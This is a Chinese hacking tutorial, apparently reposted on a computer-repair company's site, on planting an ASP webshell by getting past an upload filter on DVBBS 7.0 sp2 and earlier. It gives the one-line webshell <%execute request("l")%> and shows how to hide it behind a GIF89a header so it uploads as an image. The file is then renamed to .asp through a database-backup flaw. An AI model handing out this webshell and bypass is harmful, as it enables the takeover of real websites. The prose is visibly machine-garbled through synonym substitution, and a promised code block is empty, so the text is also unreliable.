设为主页 | 加入收藏 | 繁體中文

饶过脚本检测上传网页木马

  ------------------------------------------
  作者:江南燕  来自:http://www.hoky.org/
  声明:如您转载,请注明来由 -- 特络纳 及版权,本人作品收费共享、决不赢利,所以不得用于贸易用处。
  ------------------------------------------
  信赖各人不止一次遇到以下的环境了:明明拿到了网站的后台管理权限,依照老例,我们要将网页木马的后缀名由.asp改成.gif等图片格式,经过头像上传或是图片上传功效上传到服务器,然后在后台管理里使用数据库备份的漏洞再将其改为.asp的格式,就可以达到上传网页木马的目的了。
  以上方法敷衍一般的服务器还行,但是对方的管理员稍微有些安全意识或是他使用了某个安全性绝对好一些的整站步伐时,就会遇到问题了。
  为什么呢?因为在上传步伐里参加了剧本检测的功效,它不单检测你所上传的文件能否以.gif等后缀名末端,同时还要检测文件的内容能否包含剧本代码,要是有则还是以为步伐非法,这就以为着就算我们把.asp改成.gif也是无济于事的看来计划人员真是煞费苦心了。
  参加了剧本检测功效就一定安全了吗?不见得!这里我就和各人探讨一下我的研讨成果:
  经过阐发他的剧本,发现剧本是根据文件的头信息来果断的。因为要是一个文件的头信息不包含剧本的话,就算是上传了也不会实行。编程者好狠的心啊!如许的果断启不是让我等无饭可吃了?呵呵!而且现在很多的安全站点都是如许计划的。
  既然如许,我们也就不能客气了。好,看我的方法:
  第一步:任意找一个图象文件,这里我就找一个.gif的文件吧,用记事本翻开这个文件。会发现雷同如许的乱码:
  GIF89ad 2 鳟 P+ 傋^2&aZff仢l▌G6_伴dE@CVp3伣塝Oal:n?氫壈?a href='mailto:uJ@M@Ep'>uJ@M@Ep[[f溒橲?r?0OUh)勅圧EQ75`>7L溩嚄Wm坲QL\eyw~蝡q乢彾嬈颬偔E5Pbz^RZ嗂擰?kX]<`卻iok;-嫑?戓V1'慛>`9/kE>>欅m=1L︾O|社l便恗hc|?{疢N]~ZWQj噳M=y
  好的,现在把其他的都删掉,只留下第一行的GIF89ad字样,回车换行(牢记,一定要在下一行)写入 " <%execute request("l")%> "语句。生存。
  第二步:上传这个文件,呵呵,发现什么了?居然上传成功了!好,接上去我们在后台将其改为.asp的文件。
  第三步:本地创建htm文件写入如下代码:
 


 
 


 
  可以根据自己的必要修改相应的地方,实在明眼人一看就知道我这里使用的是 ——
  "蓝屏大叔的最小asp马"。好!运行吧,剩下的事变就看你自己的了。
  漏洞阐发:这个漏洞是使用了剧本检测只检测文件头信息而形成的,而"蓝屏大叔的最小asp马"却有着精良的容错性,只需服务端写在.asp的文件里,不论任何地方,都可以实行的特点。这真是应了那句话:世间万物必相生相克啊。而且,我已经尝试过了,要是要让剧本检测将整个文件内容都检查的话,会大大低落整站步伐的运行效率,作为编程人员是一定不会如许做的。所以,这个漏洞,我自己也临时没有想到好的解决措施,呵呵!谁让天下上最难超越的人是自己呢?看来,漏洞的弥补只好寄希望于列位看官了。
  以上漏洞在DVBBS 7.0 sp2 极端以下版本测试经过
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: